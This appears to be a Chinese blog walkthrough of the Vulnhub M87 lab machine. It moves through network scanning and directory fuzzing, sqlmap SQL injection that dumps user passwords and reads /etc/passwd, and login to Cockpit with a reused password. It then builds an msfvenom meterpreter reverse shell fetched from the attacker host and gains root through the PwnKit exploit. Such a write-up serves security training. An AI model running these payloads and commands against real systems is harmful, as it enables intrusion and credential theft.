Vulnhub之M87靶机详细测试过程(不同提权方法)

这篇具有很好参考价值的文章主要介绍了Vulnhub之M87靶机详细测试过程(不同提权方法)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

M87

识别目标主机IP地址

─(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                        
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:64:18:1b      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.250  08:00:27:10:66:7a      1      60  PCS Systemtechnik GmbH         

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.250

NMAP扫描


┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.250 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-09 22:07 EDT
Nmap scan report for bogon (192.168.56.250)
Host is up (0.00021s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE         VERSION
22/tcp   filtered ssh
80/tcp   open     http            Apache httpd 2.4.38 ((Debian))
|_http-title: M87 Login Form
|_http-server-header: Apache/2.4.38 (Debian)
9090/tcp open     ssl/zeus-admin?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p

NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、9090(ssl)

获得Shell

浏览器访问80端口,为用户登录界面,需要输入email和密码。

──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ nikto -h http://192.168.56.250
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.250
+ Target Hostname:    192.168.56.250
+ Target Port:        80
+ Start Time:         2023-04-09 22:14:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 52a, size: 5b295a9e85480, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-04-09 22:15:58 (GMT-4) (61 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

nikto工具发现了/admin目录,访问该目录,为用户登录界面,

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ gobuster dir -u http://192.168.56.250 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.sh,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.250
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,js,html,sh,txt
[+] Timeout:                 10s
===============================================================
2023/04/09 22:19:24 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 1322]
/admin                (Status: 301) [Size: 316] [--> http://192.168.56.250/admin/]
/assets               (Status: 301) [Size: 317] [--> http://192.168.56.250/assets/]
/LICENSE              (Status: 200) [Size: 1073]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1321374 / 1323366 (99.85%)
===============================================================
2023/04/09 22:24:03 Finished
===============================================================
                                                                    
┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ nikto -h https://192.168.56.250:9090
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.250
+ Target Hostname:    192.168.56.250
+ Target Port:        9090
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /O=662b442c19a840e482f9f69cde8f316e/CN=M87
                   Ciphers:  TLS_AES_256_GCM_SHA384
                   Issuer:   /O=662b442c19a840e482f9f69cde8f316e/CN=M87
+ Start Time:         2023-04-09 22:20:30 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-dns-prefetch-control' found, with contents: off
+ Uncommon header 'cross-origin-resource-policy' found, with contents: same-origin
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Hostname '192.168.56.250' does not match certificate's names: M87
+ Retrieved access-control-allow-origin header: https://192.168.56.250:9090
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  18 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-04-09 22:28:40 (GMT-4) (490 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

80端口发现了/admin目录,访问该目录,为用户登录界面,经过测试并没有发现有SQL注入漏洞。此时对/admin进一步扫描:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ dirb http://192.168.56.250     

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Apr  9 22:53:30 2023
URL_BASE: http://192.168.56.250/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.250/ ----
==> DIRECTORY: http://192.168.56.250/admin/                                                                                                                 
==> DIRECTORY: http://192.168.56.250/assets/                                                                                                                
+ http://192.168.56.250/index.html (CODE:200|SIZE:1322)                                                                                                     
+ http://192.168.56.250/LICENSE (CODE:200|SIZE:1073)                                                                                                        
+ http://192.168.56.250/server-status (CODE:403|SIZE:279)                                                                                                   
                                                                                                                                                            
---- Entering directory: http://192.168.56.250/admin/ ----
==> DIRECTORY: http://192.168.56.250/admin/backup/                                                                                                          
==> DIRECTORY: http://192.168.56.250/admin/css/                                                                                                             
==> DIRECTORY: http://192.168.56.250/admin/images/                                                                                                          
+ http://192.168.56.250/admin/index.php (CODE:200|SIZE:4393)                                                                                                
==> DIRECTORY: http://192.168.56.250/admin/js/                                                                                                              
                                                                                                                                                            
---- Entering directory: http://192.168.56.250/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.56.250/admin/backup/ ----
+ http://192.168.56.250/admin/backup/index.php (CODE:200|SIZE:4412)                                                                                         
                                                                                                                                                            
---- Entering directory: http://192.168.56.250/admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.56.250/admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.56.250/admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun Apr  9 22:53:49 2023
DOWNLOADED: 13836 - FOUND: 5
                                                        

在/admin目录下发现了/backup,该目录仍然是用户登录界面,并且尝试有无登录绕过,结果失败,对backup进行FUZZING

                                                                                                                                                            
┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ wfuzz -c -u http://192.168.56.250/admin/backup/?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 161
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.250/admin/backup/?FUZZ=id
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                     
=====================================================================

000000529:   200        87 L     162 W      4459 Ch     "id"                                                                                        
000000759:   200        3 L      2 W        19 Ch       "file"              

发现了两个参数id和file,先看一下id

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ curl http://192.168.56.250/admin/backup/?id=id
<html>

</html>
jackceobradexpensesjuliamikeadrianjohnadminalex

说明参数id存在。

经过测试file参数并不能有相应的返回。

经过简单测试id参数存在SQL注入漏洞

──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1'   
[23:00:42] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1185 HTTP(s) requests:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(5676=5676,1))),0x7176787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 5427 FROM (SELECT(SLEEP(5)))XWSn)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a6b6a71,0x75784a6770575651456c4d7279414c434a497241437a534b486d475a456b62625974585579426b6f,0x7176787171)-- -
---
[23:00:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:00:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.250'
[23:00:57] [WARNING] your sqlmap version is outdated

[*] ending @ 23:00:57 /2023-04-09/

       
─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' --dbs
available databases [4]:
[*] db
[*] information_schema
[*] mysql
[*] performance_schema

$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' -D db --tables
Database: db
[1 table]
+-------+
| users |
+-------+

─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' -D db -T users --columns
Table: users
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | varchar(50) |
| id       | int(11)     |
| password | varchar(50) |
| username | varchar(50) |
+----------+-------------+

$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' -D db -T users -C email,username,password --dump
+--------------------+----------+-----------------+
| email              | username | password        |
+--------------------+----------+-----------------+
| jack@localhost     | jack     | gae5g5a         |
| ceo@localhost      | ceo      | 5t96y4i95y      |
| brad@localhost     | brad     | gae5g5a         |
| expenses@localhost | expenses | 5t96y4i95y      |
| julia@localhost    | julia    | fw54vrfwe45     |
| mike@localhost     | mike     | 4kworw4         |
| adrian@localhost   | adrian   | fw54vrfwe45     |
| john@localhost     | john     | 4kworw4         |
| admin@localhost    | admin    | 15The4Dm1n4L1f3 |
| alex@localhost     | alex     | dsfsrw4         |
+--------------------+----------+-----------------+

但是这些email, username, 以及password都无法登录80默认页面,admin页面,admin/backup页面。

尝试通过sqlmap得到shell失败

──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' --os-shell

─(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ sqlmap -u 'http://192.168.56.250/admin/backup/?id=1' --file-read /etc/passwd    
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ cat /home/kali/.local/share/sqlmap/output/192.168.56.250/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
charlotte:x:1000:1000:charlotte,,,:/home/charlotte:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:107:115:MySQL Server,,,:/nonexistent:/bin/false
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
Debian-exim:x:109:116::/var/spool/exim4:/usr/sbin/nologin
cockpit-ws:x:110:117::/nonexisting:/usr/sbin/nologin
cockpit-wsinstance:x:111:118::/nonexisting:/usr/sbin/nologin

通过SQLMAP得到用户charlotte,尝试用该用户登录9090端口(遍历之前得到的密码)

经过尝试,密码为15The4Dm1n4L1f3

成功登陆9090管理后台,管理后台有terminal功能

charlotte@M87:~$ ls -alh
total 32K
drwxr-xr-x 3 charlotte charlotte 4.0K Nov  6  2020 .
drwxr-xr-x 3 root      root      4.0K Nov  6  2020 ..
lrwxrwxrwx 1 root      root         9 Nov  6  2020 .bash_history -> /dev/null
-rw-r--r-- 1 charlotte charlotte  220 Nov  6  2020 .bash_logout
-rw-r--r-- 1 charlotte charlotte 3.5K Nov  6  2020 .bashrc
drwx------ 3 charlotte charlotte 4.0K Apr  9 23:15 .gnupg
-rw------- 1 charlotte charlotte   33 Nov  6  2020 local.txt
-rw-r--r-- 1 charlotte charlotte  807 Nov  6  2020 .profile
-rw------- 1 charlotte charlotte   49 Nov  6  2020 .Xauthority
charlotte@M87:~$ cat local.txt
29247ebdec52ba0b9a6fd10d68f6b91f

接下里先将shell升级到meterpreter

┌──(kali㉿kali)-[~/Desktop/Vulnhub/m87]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=5555 -f elf -o escalate.elf

将escalate.elf上传到目标主机/tmp目录下

charlotte@M87:/tmp$ wget http://192.168.56.230:8000/escalate.elf
--2023-04-09 23:19:55--  http://192.168.56.230:8000/escalate.elf
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: ‘escalate.elf’

escalate.elf                                  100%[=================================================================================================>]     207  --.-KB/s    in 0s      

2023-04-09 23:19:55 (42.5 MB/s) - ‘escalate.elf’ saved [207/207]

charlotte@M87:/tmp$ chmod +x escalate.elf
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload  linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT  5555
LPORT => 5555
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.230:5555 

在目标主机运行escalate.elf


[*] Started reverse TCP handler on 192.168.56.230:5555 
[*] Sending stage (989032 bytes) to 192.168.56.250
[*] Meterpreter session 1 opened (192.168.56.230:5555 -> 192.168.56.250:34932) at 2023-04-09 23:22:06 -0400

meterpreter > 

得到了meterpreter会话

然后利用suggest模块定位可以提权的漏洞。

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.56.250 - Collecting local exploits for x86/linux...
[*] 192.168.56.250 - 167 exploit checks are being tried...
[+] 192.168.56.250 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.250 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 192.168.56.250 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.250 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.250 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
 2   exploit/linux/local/network_manager_vpnc_username_priv_esc         Yes                      The service is running, but could not be validated.
 3   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.
 4   exploit/linux/local/su_login                                       Yes                      The target appears to be vulnerable.

选择第1个漏洞进行本地提权

msf6 post(multi/recon/local_exploit_suggester) > use  exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options 

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64


msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 6666
LPORT => 6666
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.56.230:6666 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.kngdnssvny
[+] The target is vulnerable.
[*] Writing '/tmp/.mefpssoat/avrwdjlbd/avrwdjlbd.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.mefpssoat
[*] Sending stage (3020772 bytes) to 192.168.56.250
[+] Deleted /tmp/.mefpssoat/avrwdjlbd/avrwdjlbd.so
[+] Deleted /tmp/.mefpssoat/.qqfoljnxo
[+] Deleted /tmp/.mefpssoat
[*] Meterpreter session 2 opened (192.168.56.230:6666 -> 192.168.56.250:40732) at 2023-04-09 23:26:24 -0400

id

meterpreter > 
meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 11811 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(charlotte)
cd /root
ls -alh
total 28K
drwx------  4 root root 4.0K Nov  6  2020 .
drwxr-xr-x 18 root root 4.0K Nov  6  2020 ..
lrwxrwxrwx  1 root root    9 Nov  6  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  3 root root 4.0K Nov  6  2020 .gnupg
drwxr-xr-x  3 root root 4.0K Nov  6  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root 1.2K Nov  6  2020 proof.txt
cat proof.txt


MMMMMMMM               MMMMMMMM     888888888     77777777777777777777
M:::::::M             M:::::::M   88:::::::::88   7::::::::::::::::::7
M::::::::M           M::::::::M 88:::::::::::::88 7::::::::::::::::::7
M:::::::::M         M:::::::::M8::::::88888::::::8777777777777:::::::7
M::::::::::M       M::::::::::M8:::::8     8:::::8           7::::::7
M:::::::::::M     M:::::::::::M8:::::8     8:::::8          7::::::7
M:::::::M::::M   M::::M:::::::M 8:::::88888:::::8          7::::::7
M::::::M M::::M M::::M M::::::M  8:::::::::::::8          7::::::7
M::::::M  M::::M::::M  M::::::M 8:::::88888:::::8        7::::::7
M::::::M   M:::::::M   M::::::M8:::::8     8:::::8      7::::::7
M::::::M    M:::::M    M::::::M8:::::8     8:::::8     7::::::7
M::::::M     MMMMM     M::::::M8:::::8     8:::::8    7::::::7
M::::::M               M::::::M8::::::88888::::::8   7::::::7
M::::::M               M::::::M 88:::::::::::::88   7::::::7
M::::::M               M::::::M   88:::::::::88    7::::::7
MMMMMMMM               MMMMMMMM     888888888     77777777


Congratulations!

You've rooted m87!

21e5e63855f249bcd1b4b093af669b1e

mindsflee


至此成功得到了root shell和root flag

经验教训

  1. 目录扫描不能只使用一种工具,否则会漏掉重要的二级目录

  2. 本靶机的关键是识别出/admin/backup/目录后,需要FUZZ出参数?有点烧脑哈文章来源地址https://www.toymoban.com/news/detail-409480.html

到了这里,关于Vulnhub之M87靶机详细测试过程(不同提权方法)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub之Funbox 4靶机详细测试过程(提权成功)

    名称:Funbox: CTF URL: 将靶机导入 VirtualBox。配置其网卡为主机模式配置。启动 Kali Linux 和靶机。 内置 netdiscovery工具 可以将靶机的 IP 地址识别为 192.168.56.150。 利用NMAP工具进行全端口扫描: NMAP扫描结果表明目标主机有4个开放端口: 22(ssh),80(http),110(pop3),143(imap) 其实作者给出了

    2024年02月03日
    浏览(42)
  • Vulnhub之Hacksudo Thor靶机详细测试过程(提权成功)

    作者:jason huawen 名称:hacksudo: Thor 地址: 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.160 NMAP扫描结果显示目标主机有2个开放端口:22(ssh)、80(http),21端口状态为过滤 Gobuster工具没有扫描出有价值的目录或者文件,更换字典继续扫描: 更换字典后,扫描出/ad

    2023年04月26日
    浏览(36)
  • Vulnhub之Hacksudo Fog靶机详细测试过程(不同的方法)

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 FTP服务为Pure-FTPd, 版本未知 不允许匿名访问 可能存在可以利用的漏洞 经简单尝试,mysql不存在弱口令漏洞。 虽然目标主机配置了NFS共享,但是没有得到共享目录名称。 访问80端口,页面中有链接index1.html 访问gi

    2023年04月25日
    浏览(33)
  • Vulnhub之Infosec Warrior靶机详细测试过程(不同的思路)

    作者: jason huawen 名称:InfoSecWarrior CTF 2020: 01 地址: 利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.253 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(HTTP) 接下里看能否扫码出目录或者文件? cmd.php文件被重定向到外网的网站。 但是cmd.php看上去就是有命令

    2023年04月17日
    浏览(33)
  • Vulnhub之Decoy靶机-详细提权过程补充

    在拿到用户296640a3b825115a47b68fc44501c828的密码server后,为了方便观察现象,同时开启两个shell,并且需要指定-t \\\"bash --noprofile\\\"以逃避受限shell,登录成功后,要修改PATH环境变量,使其包含正常的环境变量: 在日志文件中看到有关chkrootkit的日志信息,chkrootkit是检查系统是否存在后门的

    2024年02月06日
    浏览(31)
  • Vulnhub之Gigroot靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.103 NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、11211(?) 将wp.gitroot.vuln加入/etc/hosts文件中: 此时访问url,从返回页面可知目标为Wordpress站点: 因为我们已知目标运行wordpress站点,因此从gobuster和nikto工具运

    2024年02月01日
    浏览(36)
  • Vulnhub之GreenOptics靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有5个开放端口:21(ftp)、22(ssh)、53(dns)、80(http)、10000(http) 说明需要添加主机记录到/etc/hosts文件: 再次访问: 返回页面为用户登录界面,10000端口的信息收集暂时告一段落。 nikto没有得到

    2024年02月01日
    浏览(39)
  • Vulnhub之Inclusiveness靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.111 NMAP扫描结果表明目标主机有3个开放端口:21(ftp)、22(ssh)、80(http) 对FTP服务的信息收集结果如下: 目标主机允许匿名访问 匿名用户允许上传文件 匿名用户无法变换目录 FTP服务版本没有漏洞可利用 接下来做一下目

    2023年04月19日
    浏览(39)
  • Vulnhub之Maskcrafter靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 john没有破解出credit.zip密码,而且作者有提示,不需要使用破解方法。 目标主机没有NFS共享目录。 Kali Linux访问80端口,为用户登录界面,用admin\\\' or 1=1 -- 即可轻松绕过。 登录成功后,在页面源代码中有注释: 访问

    2023年04月10日
    浏览(29)
  • Vulnhub之Healthcare靶机详细测试过程

    作者: jason huawen 名称: 地址: 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有2个开放端口:21(ftp)、80(http) FTP不允许匿名访问 FTP服务为ProFTPD,可能存在mod_copy漏洞 robots.txt存在/admin/条目,但是访问该目录,却返回页面不存在的错误

    2023年04月22日
    浏览(53)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包